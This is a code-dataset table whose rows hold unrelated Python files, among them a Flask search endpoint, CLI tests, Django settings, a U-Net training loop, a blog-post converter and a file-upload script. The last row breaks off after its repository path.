hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
058a7c137ede0bf5c3a55a3ce41c3dfb2936df30
| 2,079
|
py
|
Python
|
src/views/list.py
|
AllForJan/prizma-backend
|
fe866e74fa01e900cc7eab624bb5716a4bae056d
|
[
"MIT"
] | 2
|
2018-04-08T22:18:11.000Z
|
2018-04-26T08:12:46.000Z
|
src/views/list.py
|
AllForJan/prizma-backend
|
fe866e74fa01e900cc7eab624bb5716a4bae056d
|
[
"MIT"
] | null | null | null |
src/views/list.py
|
AllForJan/prizma-backend
|
fe866e74fa01e900cc7eab624bb5716a4bae056d
|
[
"MIT"
] | 2
|
2018-04-08T22:18:13.000Z
|
2018-04-08T22:18:18.000Z
|
from elasticsearch import Elasticsearch
from flask import request, jsonify
from flask_restful import Resource
from db.manager import get_conn
import settings
conn = get_conn()
def append_range_filter(f, key, _from, to):
d = {}
if _from or to:
d['range'] = {}
d['range'][key] = {}
if _from:
d['range'][key]['gte'] = _from
if to:
d['range'][key]['lte'] = to
f.append(d)
return f
class ListPO(Resource):
def get(self):
q = request.args.get('q', None)
es = Elasticsearch(
[settings.ELASTIC_HOST, ],
timeout=30, max_retries=10, retry_on_timeout=True, port=settings.ELASTIC_PORT
)
if not q:
query = {'query': {'match_all': {}}}
results = es.search(index='apa', doc_type='po', body=query)
rows = [{
'data': r['_source'], '_id': r['_id']
} for r in results['hits']['hits']]
return jsonify(rows)
rok_from = request.args.get('rok_from', None)
rok_to = request.args.get('rok_to', None)
suma_from = request.args.get('suma_from', None)
suma_to = request.args.get('suma_to')
# append filters
f = []
append_range_filter(f, 'rok', rok_from, rok_to)
append_range_filter(f, 'suma', suma_from, suma_to)
query = {
"sort": [
{"suma": {"order": "desc"}}
],
"query": {
"bool": {
"must": [
{
"match": {
"meno": {"query":q, "operator": "and"}
}
},
],
# "filter": []
}
}
}
query['query']['bool']['must'].extend(f)
results = es.search(index='apa', doc_type='po', body=query)
rows = [{
'data': r['_source'], '_id': r['_id']
} for r in results['hits']['hits']]
return rows
| 25.353659
| 89
| 0.457431
| 1,636
| 0.786917
| 0
| 0
| 0
| 0
| 0
| 0
| 328
| 0.157768
|
058ba31e5a3c9cecbd73c880b21c4ea42a75e1cf
| 3,056
|
py
|
Python
|
tests/test_cli.py
|
SlawekNowy/vpk
|
3c9e175f48d8d56b5995387bcaa2c16ec62f9688
|
[
"MIT"
] | 116
|
2015-08-29T23:24:28.000Z
|
2022-03-04T19:35:52.000Z
|
tests/test_cli.py
|
SlawekNowy/vpk
|
3c9e175f48d8d56b5995387bcaa2c16ec62f9688
|
[
"MIT"
] | 27
|
2015-07-30T16:44:17.000Z
|
2021-12-25T19:00:44.000Z
|
tests/test_cli.py
|
SlawekNowy/vpk
|
3c9e175f48d8d56b5995387bcaa2c16ec62f9688
|
[
"MIT"
] | 21
|
2015-08-03T23:57:25.000Z
|
2021-12-21T10:29:59.000Z
|
import sys
import unittest
from contextlib import contextmanager
try:
from io import StringIO
except ImportError:
from StringIO import StringIO
from vpk import cli
@contextmanager
def capture_stdout():
new_out = StringIO()
old_out = sys.stdout
try:
sys.stdout = new_out
yield sys.stdout
finally:
sys.stdout = old_out
class testcase_cli(unittest.TestCase):
def setUp(self):
self.vpk_path = './tests/test_dir.vpk'
self.parser = cli.make_argparser()
self.vpk_content = ['testfile1.txt', 'testdir/testfile2.txt', 'a/b/c/d/testfile3.bin']
def run_cli_with_args(self, args):
args = self.parser.parse_args(args)
with capture_stdout() as stdout:
cli.run(args)
stdout = stdout.getvalue().split()
return stdout
def test_cli_list(self):
stdout = self.run_cli_with_args([self.vpk_path, '--list'])
self.assertEqual(len(stdout), len(self.vpk_content))
for expected_content in self.vpk_content:
self.assertIn(expected_content, stdout)
def test_cli_list_filter_filter(self):
# filter on file name
stdout = self.run_cli_with_args([self.vpk_path, '--list', '--filter', '*file2*'])
self.assertEqual(len(stdout), 1)
self.assertIn(self.vpk_content[1], stdout)
# filter on dir name
stdout = self.run_cli_with_args([self.vpk_path, '--list', '--filter', 'testdir*'])
self.assertEqual(len(stdout), 1)
self.assertIn(self.vpk_content[1], stdout)
# use filter as exclusion
stdout = self.run_cli_with_args([self.vpk_path, '--list', '--filter', '*file2*', '-v'])
self.assertEqual(len(stdout), 2)
self.assertIn(self.vpk_content[0], stdout)
self.assertIn(self.vpk_content[2], stdout)
def test_cli_list_filter_name(self):
# filter on file name
stdout = self.run_cli_with_args([self.vpk_path, '--list', '-name', '*file2*'])
self.assertEqual(len(stdout), 1)
self.assertIn(self.vpk_content[1], stdout)
# filter on dir name (should not work)
stdout = self.run_cli_with_args([self.vpk_path, '--list', '-name', 'testdir*'])
self.assertEqual(len(stdout), 0)
# use filter as exclusion
stdout = self.run_cli_with_args([self.vpk_path, '--list', '-name', '*file2*', '-v'])
self.assertEqual(len(stdout), 2)
self.assertIn(self.vpk_content[0], stdout)
self.assertIn(self.vpk_content[2], stdout)
def test_cli_list_filter_regex(self):
stdout = self.run_cli_with_args([self.vpk_path, '--list', '--regex', r'file2\.t[tx]{2}$'])
self.assertEqual(len(stdout), 1)
self.assertIn(self.vpk_content[1], stdout)
# use filter as exclusion
stdout = self.run_cli_with_args([self.vpk_path, '--list', '--regex', r'file2\.t[tx]{2}$', '-v'])
self.assertEqual(len(stdout), 2)
self.assertIn(self.vpk_content[0], stdout)
self.assertIn(self.vpk_content[2], stdout)
| 35.534884
| 105
| 0.634162
| 2,684
| 0.878272
| 176
| 0.057592
| 192
| 0.062827
| 0
| 0
| 505
| 0.165249
|
058c253ae43e29116887b045dfd233f62ef4ccf0
| 218
|
py
|
Python
|
cpab/cpaNd/model/__init__.py
|
freifeld/cpabDiffeo
|
22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6
|
[
"MIT"
] | 17
|
2016-03-16T21:35:36.000Z
|
2021-11-11T04:16:21.000Z
|
cpab/cpaNd/model/__init__.py
|
freifeld/cpabDiffeo
|
22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6
|
[
"MIT"
] | null | null | null |
cpab/cpaNd/model/__init__.py
|
freifeld/cpabDiffeo
|
22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6
|
[
"MIT"
] | 4
|
2016-08-12T23:02:09.000Z
|
2019-03-14T18:20:36.000Z
|
from _LogLikelihood import LogLikelihood
from _LogPrior import LogPrior
#from _ScaleDependentLogLikelihoodGaussian import ScaleDependentLogLikelihoodGaussian
from _ScaleDependentLogPrior import ScaleDependentLogPrior
| 36.333333
| 85
| 0.917431
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 85
| 0.389908
|
058c66b876771cc78eea5a8cc9478dd196dd972b
| 1,768
|
py
|
Python
|
authentic/authentic.settings.py
|
GuillaumeGautierLA/publik
|
5ef6c19e9b91bf066717b4bc9df2540f4c2e1bc2
|
[
"MIT"
] | null | null | null |
authentic/authentic.settings.py
|
GuillaumeGautierLA/publik
|
5ef6c19e9b91bf066717b4bc9df2540f4c2e1bc2
|
[
"MIT"
] | 13
|
2019-12-21T09:48:42.000Z
|
2020-07-01T19:12:28.000Z
|
authentic/authentic.settings.py
|
GuillaumeGautierLA/publik
|
5ef6c19e9b91bf066717b4bc9df2540f4c2e1bc2
|
[
"MIT"
] | 4
|
2020-01-06T16:00:00.000Z
|
2021-01-08T14:46:29.000Z
|
# To pass env vars to Python scripts run by Publik in services which remove custom env vars:
# https://unix.stackexchange.com/questions/44370/how-to-make-unix-service-see-environment-variables
# So we hardcode the values in the file below when the container starts
import sys
sys.path.insert(0, "/home")
from pyenv import *
# Databases
DATABASES['default']['ENGINE'] = 'tenant_schemas.postgresql_backend'
DATABASES['default']['NAME'] = DB_AUTHENTIC_NAME
DATABASES['default']['USER'] = DB_AUTHENTIC_USER
DATABASES['default']['PASSWORD'] = DB_AUTHENTIC_PASS
DATABASES['default']['HOST'] = 'db'
DATABASES['default']['PORT'] = DB_PORT
BROKER_URL = 'amqp://{user}:{password}@rabbitmq:{port}//'.format(
user=RABBITMQ_DEFAULT_USER,
password=RABBITMQ_DEFAULT_PASS,
port=RABBITMQ_PORT,
)
# Zone
LANGUAGE_CODE = 'fr-fr'
TIME_ZONE = 'Europe/Paris'
# Email configuration
ADMINS = (
(ERROR_MAIL_AUTHOR, ERROR_MAIL_ADDR),
)
EMAIL_SUBJECT_PREFIX = '[authentic] '
SERVER_EMAIL = ERROR_MAIL_ADDR
DEFAULT_FROM_EMAIL = ERROR_MAIL_ADDR
# SMTP configuration
EMAIL_HOST = SMTP_HOST
EMAIL_HOST_USER = SMTP_USER
EMAIL_HOST_PASSWORD = SMTP_PASS
EMAIL_PORT = SMTP_PORT
# HTTPS Security
CSRF_COOKIE_SECURE = True
SESSION_COOKIE_SECURE = True
# Idp
# SAML 2.0 IDP
#A2_IDP_SAML2_ENABLE = False
# CAS 1.0 / 2.0 IDP
#A2_IDP_CAS_ENABLE = False
# OpenID 1.0 / 2.0 IDP
#A2_IDP_OPENID_ENABLE = False
# Authentifications
#A2_AUTH_PASSWORD_ENABLE = True
#A2_SSLAUTH_ENABLE = False
CACHES = {
'default': {
'BACKEND': 'hobo.multitenant.cache.TenantCache',
'REAL_BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': '127.0.0.1:11211',
}
}
# Role provisionning via local RabbitMQ
HOBO_ROLE_EXPORT = True
LOGGING = LOGGING_FROM_PYENV
| 26.38806
| 99
| 0.750566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 963
| 0.544683
|
058f090a9e7707433a3105b87e3e591439fed2ac
| 8,377
|
py
|
Python
|
code/train/train_model.py
|
96jhwei/Genetic-U-Net
|
25116f01afcf8ed4386cd0fc258da15e1c982cb5
|
[
"MIT"
] | 14
|
2021-09-09T11:22:17.000Z
|
2022-03-14T10:06:36.000Z
|
code/train/train_model.py
|
96jhwei/Genetic-U-Net
|
25116f01afcf8ed4386cd0fc258da15e1c982cb5
|
[
"MIT"
] | 1
|
2021-11-24T10:30:36.000Z
|
2021-11-24T10:30:36.000Z
|
code/train/train_model.py
|
96jhwei/Genetic-U-Net
|
25116f01afcf8ed4386cd0fc258da15e1c982cb5
|
[
"MIT"
] | 5
|
2021-11-02T09:29:49.000Z
|
2022-03-25T09:44:25.000Z
|
import numpy
from torch.utils.data import DataLoader
from tqdm import tqdm
from loss.FocalLoss import FocalLossForSigmoid
import torch
from metrics.calculate_metrics import calculate_metrics
import shutil
from metrics.average_meter import AverageMeter
import torch.multiprocessing
from torch.nn.utils.clip_grad import clip_grad_norm_
import os
import sys
import numpy as np
import random
from thop import profile
from .util.get_optimizer import get_optimizer
from dataset.util.get_datasets import get_datasets
import multiprocessing as mp
sys.path.append('../')
def train_one_model(optimizer_name, learning_rate, l2_weight_decay, gen_num, ind_num, model, batch_size, epochs, device,
train_set_name, valid_set_name,
train_set_root, valid_set_root, exp_name,
mode='train'):
seed = 12
torch.cuda.empty_cache()
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
random.seed(seed)
np.random.seed(seed)
torch.backends.cudnn.benchmark = True
model.to(device)
model.train()
loss_func = FocalLossForSigmoid(reduction='mean').to(device)
optimizer = get_optimizer(optimizer_name, filter(lambda p: p.requires_grad, model.parameters()), learning_rate, l2_weight_decay)
train_set, num_return = get_datasets(train_set_name, train_set_root, True)
valid_set, _ = get_datasets(valid_set_name, valid_set_root, False)
train_loader = DataLoader(dataset=train_set, batch_size=batch_size, shuffle=True, num_workers=3)
valid_loader = DataLoader(dataset=valid_set, batch_size=1, shuffle=False, num_workers=1)
best_f1_score = 0
flag = 0
count = 0
valid_epoch = 80
metrics_name = ['flops', 'param', 'accuracy', 'recall', 'specificity', 'precision', 'f1_score', 'auroc', 'iou']
metrics = {}
for metric_name in metrics_name:
if metric_name == 'flops' or metric_name == 'param':
metrics.update({metric_name: 100})
else:
metrics.update({metric_name: 0})
try:
for i in range(epochs):
train_tqdm_batch = tqdm(iterable=train_loader, total=numpy.ceil(len(train_set) / batch_size))
for images, targets in train_tqdm_batch:
images, targets = images.to(device), targets.to(device)
optimizer.zero_grad()
preds = model(images)
loss = loss_func(preds, targets)
loss.backward()
clip_grad_norm_(model.parameters(), 0.1)
optimizer.step()
train_tqdm_batch.close()
print('gens_{} individual_{}_epoch_{} train end'.format(gen_num, ind_num, i))
epoch_acc = AverageMeter()
epoch_recall = AverageMeter()
epoch_precision = AverageMeter()
epoch_specificity = AverageMeter()
epoch_f1_score = AverageMeter()
epoch_iou = AverageMeter()
epoch_auroc = AverageMeter()
if (i >= valid_epoch):
with torch.no_grad():
model.eval()
valid_tqdm_batch = tqdm(iterable=valid_loader, total=numpy.ceil(len(valid_set) / 1))
for images, targets in valid_tqdm_batch:
images = images.to(device)
targets = targets.to(device)
preds = model(images)
(acc, recall, specificity, precision,
f1_score, iou, auroc) = calculate_metrics(preds=preds, targets=targets, device=device)
epoch_acc.update(acc)
epoch_recall.update(recall)
epoch_precision.update(precision)
epoch_specificity.update(specificity)
epoch_f1_score.update(f1_score)
epoch_iou.update(iou)
epoch_auroc.update(auroc)
if i == valid_epoch:
flops, param = profile(model=model, inputs=(images,), verbose=False)
flops = flops / 1e11
param = param / 1e6
print('gens_{} individual_{}_epoch_{} validate end'.format(gen_num, ind_num, i))
print('acc:{} | recall:{} | spe:{} | pre:{} | f1_score:{} | auroc:{}'
.format(epoch_acc.val,
epoch_recall.val,
epoch_specificity.val,
epoch_precision.val,
epoch_f1_score.val,
epoch_auroc.val))
if epoch_f1_score.val > best_f1_score:
best_f1_score = epoch_f1_score.val
flag = i
count = 0
for key in list(metrics):
if key == 'flops':
metrics[key] = flops
elif key == 'param':
metrics[key] = param
elif key == 'accuracy':
metrics[key] = epoch_acc.val
elif key == 'recall':
metrics[key] = epoch_recall.val
elif key == 'specificity':
metrics[key] = epoch_specificity.val
elif key == 'precision':
metrics[key] = epoch_precision.val
elif key == 'f1_score':
metrics[key] = epoch_f1_score.val
elif key == 'auroc':
metrics[key] = epoch_auroc.val
elif key == 'iou':
metrics[key] = epoch_iou.val
else:
raise NotImplementedError
import pandas as pd
from os.path import join
performance_df = pd.DataFrame(
data=[[gen_num, ind_num, epoch_acc.val, epoch_recall.val, epoch_specificity.val,
epoch_precision.val,
epoch_f1_score.val, epoch_iou.val, epoch_auroc.val]],
columns=['epoch', 'individual', 'acc', 'recall',
'specificity', 'precision', 'f1_score', 'iou',
'auroc', ]
)
performance_csv_path = join(os.path.abspath('.'), 'exps/{}/csv'.format(exp_name),
'gens_{} individual_{} performance.csv'.format(gen_num, ind_num))
performance_df.to_csv(performance_csv_path)
else:
if i >= valid_epoch:
count += 1
end = None
if i > valid_epoch + 15 and best_f1_score < 0.50:
end = True
if (count >= 70) or end:
print('current best epoch_{} best_f1_score:'.format(flag), best_f1_score)
print('gens_{} individual_{} train early stop'.format(gen_num, ind_num))
print('=======================================================================')
valid_tqdm_batch.close()
return metrics, True
print('current best epoch_{} best_f1_score:'.format(flag), best_f1_score)
valid_tqdm_batch.close()
print('current best epoch_{} best_f1_score:'.format(flag), best_f1_score)
print('=======================================================================')
except RuntimeError as exception:
images.detach_()
del images
del model
del targets
return metrics, False
return metrics, True
| 45.037634
| 133
| 0.493613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 771
| 0.092038
|
059016200f557d7398f34c3a96008e7fee9686c3
| 961
|
py
|
Python
|
dataset/check_for_duplicates.py
|
mathildor/TF-SegNet
|
dff209c8174b5e8fa77b4c2644298f6903a09445
|
[
"MIT"
] | 98
|
2017-11-06T15:55:22.000Z
|
2022-03-22T11:29:47.000Z
|
dataset/check_for_duplicates.py
|
yingz9/TF-SegNet
|
dff209c8174b5e8fa77b4c2644298f6903a09445
|
[
"MIT"
] | 8
|
2017-11-15T06:05:41.000Z
|
2019-06-19T06:53:03.000Z
|
dataset/check_for_duplicates.py
|
yingz9/TF-SegNet
|
dff209c8174b5e8fa77b4c2644298f6903a09445
|
[
"MIT"
] | 34
|
2017-11-06T03:05:54.000Z
|
2022-01-25T16:00:09.000Z
|
import os
from PIL import Image
import numpy
from PIL import ImageChops
""" TESTED:
No duplicates in:
- within validation images first part (stopped because of training - took to much time)
"""
image_path="../../IR_images/combined_dataset/val_images/images"
# image_path="../../IR_images/combined_dataset/val_images/images"
images = sorted(os.listdir(image_path))
for image_file_1 in images:
for image_file_2 in images:
image1 = Image.open(os.path.join(image_path,image_file_1))
image2 = Image.open(os.path.join(image_path,image_file_2))
#pixels = image.load()
if ImageChops.difference(image1, image2).getbbox() is None:
# if(image1==image2):# and image_file_1 != image_file_2):
print("Same image!!!")
print(image_file_1)
print(image_file_2)
# else:
# print("not same")
# print(image_file_1)
# print(image_file_2)
| 26.694444
| 95
| 0.648283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 427
| 0.444329
|
059038232d1c85e48c2eed487377d93d1ad944f4
| 1,983
|
py
|
Python
|
_posts/import.py
|
suepeng/suepeng.github.io
|
844e0063e0604a77886aad5eaea588c4df2792a9
|
[
"MIT"
] | null | null | null |
_posts/import.py
|
suepeng/suepeng.github.io
|
844e0063e0604a77886aad5eaea588c4df2792a9
|
[
"MIT"
] | null | null | null |
_posts/import.py
|
suepeng/suepeng.github.io
|
844e0063e0604a77886aad5eaea588c4df2792a9
|
[
"MIT"
] | null | null | null |
import os, glob
from dateutil import parser
from bs4 import BeautifulSoup
ext = lambda line, cap: line.replace("\s", "").replace(cap, "").strip()
def write_post(doc):
meta = {
'title' : ext(doc[0], "TITLE:"),
'date' : parser.parse(ext(doc[2], "DATE:")).strftime("%Y-%m-%d"),
'tag' : ext(doc[3], "PRIMARY CATEGORY:"),
'status': ext(doc[4], "STATUS:"),
'imgs' : BeautifulSoup("".join(doc), features="html.parser").find_all('img'),
}
if not os.path.exists(meta['tag']):
os.makedirs(meta['tag'])
fname = f"{meta['tag']}/{meta['date']}-{meta['title'].replace('/', ' ')}.md"
publish = 'true' if meta['status'] == 'publish' else 'false'
feature = meta['imgs'][0].attrs['src'] if len(meta['imgs']) > 0 else None
with open(fname, "wt") as f:
# write meta
f.write("---\n")
f.write(f"layout: post\n")
f.write(f"title: {meta['title']}\n")
f.write(f"date: {meta['date']}\n")
f.write(f"tag: {meta['tag']}\n")
if feature:
f.write(f"feature: \"{feature}\"\n")
f.write(f"published: {publish} \n")
f.write("---\n")
# write boddy
body = False
for d in doc:
if (d[:3] == '---'):
continue
if ('<!-- more -->' in d):
d = d.replace('<!-- more -->', "").strip()
if len(d) > 0 and body:
f.write(d)
body = ('BODY' in d) or body
print(f"done {fname}")
return True
#------------------------------
# Main
#------------------------------
if __name__ == "__main__":
posts = 0
doc = []
for idx, line in enumerate(open("raw.txt").readlines()):
if len(doc) and ('TITLE:' in line):
posts += write_post(doc)
doc, meta = [], {}
doc.append(line)
# latest post
posts += write_post(doc)
print(f"converted {posts} posts with {idx} lines")
| 31.983871
| 86
| 0.474534
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 639
| 0.322239
|
0594a8c465e7b18e9888443f247ba1cf8ff7c9cf
| 702
|
py
|
Python
|
layers/reshape.py
|
WJGiles/Dorknet
|
1582937e843b1a911334291c25ea415fb56e5ccc
|
[
"MIT"
] | null | null | null |
layers/reshape.py
|
WJGiles/Dorknet
|
1582937e843b1a911334291c25ea415fb56e5ccc
|
[
"MIT"
] | null | null | null |
layers/reshape.py
|
WJGiles/Dorknet
|
1582937e843b1a911334291c25ea415fb56e5ccc
|
[
"MIT"
] | 1
|
2020-07-27T17:03:22.000Z
|
2020-07-27T17:03:22.000Z
|
import numpy as np
from .layer import Layer
class ReshapeLayer:
def __init__(self, layer_name, input_shape, output_shape):
super.__init__(layer_name)
self.input_shape = input_shape
self.output_shape = output_shape
def __repr__(self):
s = "ReshapeLayer(input_shape={}, output_shape={})".format(self.input_shape,
self.output_shape)
return s
def forward(self, X, test_mode=False):
return X.reshape(self.output_shape)
def backward(self, upstream_dx):
return upstream_dx.reshape(self.input_shape)
| 33.428571
| 85
| 0.564103
| 657
| 0.935897
| 0
| 0
| 0
| 0
| 0
| 0
| 47
| 0.066952
|
059744913f1e643dc9fe5a6332d2aff7847d00ed
| 3,342
|
py
|
Python
|
Project/checking_test2.py
|
mihdenis85/psycho_test
|
51bbe82043427d48e80ff36197815212c5c2a14c
|
[
"MIT"
] | null | null | null |
Project/checking_test2.py
|
mihdenis85/psycho_test
|
51bbe82043427d48e80ff36197815212c5c2a14c
|
[
"MIT"
] | null | null | null |
Project/checking_test2.py
|
mihdenis85/psycho_test
|
51bbe82043427d48e80ff36197815212c5c2a14c
|
[
"MIT"
] | null | null | null |
def specialization(a, spec, jobs):
if a>=0 and a<=2:
return(spec + ': интерес к данной профессиональной сфере не выражен')
elif a>=3 and a<=6:
return(spec + ': профессиональная направленность и интерес выражены в средней степени. ' + 'Возможно вам будут интересны такие профессии будущего, как ' + jobs)
elif a>=7 and a<=8:
return(spec +': профессиональная направленность выражена довольно ярко и отчетливо. ' + 'Вам будут интересны такие профессии, которые будут актуальны в будущем, как '+ jobs)
def check_test2(answers):
p=0
chez1=0
t=0
z=0
h=0
n=answers[0]
if n==1:
p+=1
elif n==2:
t+=1
n=answers[1]
if n==1:
chez1+=1
elif n==2:
z+=1
n=answers[2]
if n==1:
h+=1
elif n==2:
p+=1
n=answers[3]
if n==1:
t+=1
elif n==2:
chez1+=1
n=answers[4]
if n==1:
z+=1
elif n==2:
h+=1
n=answers[5]
if n==1:
p+=1
elif n==2:
chez1+=1
n=answers[6]
if n==1:
h+=1
elif n==2:
t+=1
n=answers[7]
if n==1:
chez1+=1
elif n==2:
h+=1
n=answers[8]
if n==1:
t+=1
elif n==2:
z+=1
n=answers[9]
if n==1:
p+=1
elif n==2:
z+=1
n=answers[10]
if n==1:
p+=1
elif n==2:
t+=1
n=answers[11]
if n==1:
chez1+=1
elif n==2:
z+=1
n=answers[12]
if n==1:
h+=1
elif n==2:
p+=1
n=answers[13]
if n==1:
t+=1
elif n==2:
chez1+=1
n=answers[14]
if n==1:
z+=1
elif n==2:
h+=1
n=answers[15]
if n==1:
p+=1
elif n==2:
chez1+=1
n=answers[16]
if n==1:
h+=1
elif n==2:
t+=1
n=answers[17]
if n==1:
chez1+=1
elif n==2:
h+=1
n=answers[18]
if n==1:
t+=1
elif n==2:
z+=1
n=answers[19]
if n==1:
p+=1
elif n==2:
z+=1
pechat1=specialization(p, 'Природа', 'ИТ-генетик, Биофармаколог, Архитектор живых систем, Парковый эколог, ГМО-агроном, Портовый эколог, Сельскохозяйственный эколог, Космобиолог, Урбанист-эколог')
pechat2=specialization(t, 'Техника', 'Проектировщик композитных конструкций для транспортных средств, Проектировщик нанотехнологических материалов, Глазир, Архитектор территорий, Конструктор новых металлов')
pechat3=specialization(chez1, 'Сфера обслуживания', 'Врач, Генетический консультант, Молекулярный диетолог, Тренер творческих занятий, Личный тьютор по эстетическому развитию, Разработчик персональных пенсионных акладов')
pechat4=specialization(z, 'Точные науки и музыка(игра на музыкальных инструментах)', 'Музыкант, Танцор, Переводчик фильмов, Энергоаудитор, Оператор Многофункциональных технических комплексов, Агроном экономист, ')
pechat5=specialization(h, 'Творческие профессии', 'Создатель спецэффектов, Видеохудожник, Театральный художник, Аранжировщик, Шоураннер, Балетмейстер, Дирижёр, Живописец, Танцор, Режиссер, Художник-технолог, Science-художник, Видеограф, Специалист по озвучиванию и звуковым спецэффектам в кино, Инфо-стилист, Архитектор виртуальности')
return pechat1 + ' ' + pechat2 + ' ' + pechat3 + ' ' + pechat4 + ' ' + pechat5
| 27.85
| 339
| 0.578995
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,515
| 0.561008
|
05975def902880bc29f1fd9e4b623039913f810f
| 4,003
|
py
|
Python
|
src/upload/upload.py
|
alliance-genome/agr_ferret
|
e2ccef16308b1a8a6f1b2a3dde6e29e0530da721
|
[
"MIT"
] | 2
|
2020-07-22T14:25:00.000Z
|
2021-09-20T18:29:08.000Z
|
src/upload/upload.py
|
alliance-genome/agr_ferret
|
e2ccef16308b1a8a6f1b2a3dde6e29e0530da721
|
[
"MIT"
] | 6
|
2019-09-24T14:09:42.000Z
|
2021-06-07T15:27:55.000Z
|
src/upload/upload.py
|
alliance-genome/agr_ferret
|
e2ccef16308b1a8a6f1b2a3dde6e29e0530da721
|
[
"MIT"
] | 3
|
2020-12-19T08:57:51.000Z
|
2020-12-19T08:58:09.000Z
|
# Functions for use in downloading files.
import logging, os, requests, json, hashlib, urllib
from requests_toolbelt.utils import dump
from retry import retry
logger = logging.getLogger(__name__)
def create_md5(worker, filename, save_path):
# Generate md5
logger.info('{}: Generating md5 hash for {}.'.format(worker, filename))
hash_md5 = hashlib.md5()
with open(os.path.join(save_path, filename), 'rb') as f:
for chunk in iter(lambda: f.read(4096), b''):
hash_md5.update(chunk)
logger.info('{}: Finished generating md5 hash: {}'.format(worker, hash_md5.hexdigest()))
return hash_md5.hexdigest()
def upload_file(worker, filename, save_path, upload_file_prefix, config_info):
file_to_upload = {upload_file_prefix: open(os.path.join(save_path, filename), 'rb')}
headers = {
'Authorization': 'Bearer {}'.format(config_info.config['API_KEY'])
}
logger.debug('{}: Attempting upload of data file: {}'.format(worker, os.path.join(save_path, filename)))
logger.debug('{}: Attempting upload with header: {}'.format(worker, headers))
logger.info("{}: Uploading data to {}) ...".format(worker, config_info.config['FMS_API_URL']+'/api/data/submit/'))
response = requests.post(config_info.config['FMS_API_URL']+'/api/data/submit/', files=file_to_upload, headers=headers)
logger.info(response.text)
@retry(tries=5, delay=5, logger=logger)
def upload_process(worker, filename, save_path, data_type, data_sub_type, config_info):
release = config_info.config['ALLIANCE_RELEASE']
upload_file_prefix = '{}_{}_{}'.format(release, data_type, data_sub_type)
generated_md5 = create_md5(worker, filename, save_path)
# Attempt to grab MD5 for the latest version of the file.
logger.debug(config_info.config['FMS_API_URL'] + '/api/datafile/by/{}/{}?latest=true'.format(data_type, data_sub_type))
url_to_check = config_info.config['FMS_API_URL'] + '/api/datafile/by/{}/{}?latest=true'.format(data_type, data_sub_type)
chip_response = urllib.request.urlopen(url_to_check)
chip_data = data = json.loads(chip_response.read().decode(chip_response.info().get_param('charset') or 'utf-8'))
logger.debug('{}: Retrieved API data from chipmunk: {}'.format(worker, chip_data))
# Check for existing MD5
logger.info('{}: Checking for existing MD5 from chipmunk.'.format(worker))
# Logic for uploading new files based on existing and new MD5s.
if not chip_data:
logger.info('{}: No response received from the FMS. A new file will be uploaded.'.format(worker))
logger.info('{}: File: {}'.format(worker, filename))
upload_file(worker, filename, save_path, upload_file_prefix, config_info)
else:
existing_md5 = chip_data[0].get('md5Sum')
if existing_md5:
logger.info('{}: Previous MD5 found: {}'.format(worker, existing_md5))
if existing_md5 == generated_md5:
logger.info('{}: Existing MD5 matches the newly generated MD5. The file will not be uploaded.'.format(worker))
logger.info('{}: File: {}'.format(worker, filename))
logger.info('{}: Existing: {} New: {}'.format(worker, existing_md5, generated_md5))
else:
logger.info('{}: Existing MD5 does not match the newly generated MD5. A new file will be uploaded.'.format(worker))
logger.info('{}: File: {}'.format(worker, filename))
logger.info('{}: Existing: {} New: {}'.format(worker, existing_md5, generated_md5))
upload_file(worker, filename, save_path, upload_file_prefix, config_info)
else:
logger.info('{}: Existing MD5 not found. A new file will be uploaded.'.format(worker))
logger.info('{}: File: {}'.format(worker, filename))
logger.info('{}: Existing: {} New: {}'.format(worker, existing_md5, generated_md5))
upload_file(worker, filename, save_path, upload_file_prefix, config_info)
| 51.320513
| 131
| 0.673995
| 0
| 0
| 0
| 0
| 2,621
| 0.654759
| 0
| 0
| 1,186
| 0.296278
|
0597da213baf4860aef1103fe9f6eaf312ad6be5
| 9,246
|
py
|
Python
|
Klipps/convert.py
|
rafalkaron/KindleClippingsBeautifier
|
10d79da2a073f8867041a2520d7a234937237243
|
[
"MIT"
] | 1
|
2020-05-25T11:30:54.000Z
|
2020-05-25T11:30:54.000Z
|
Klipps/convert.py
|
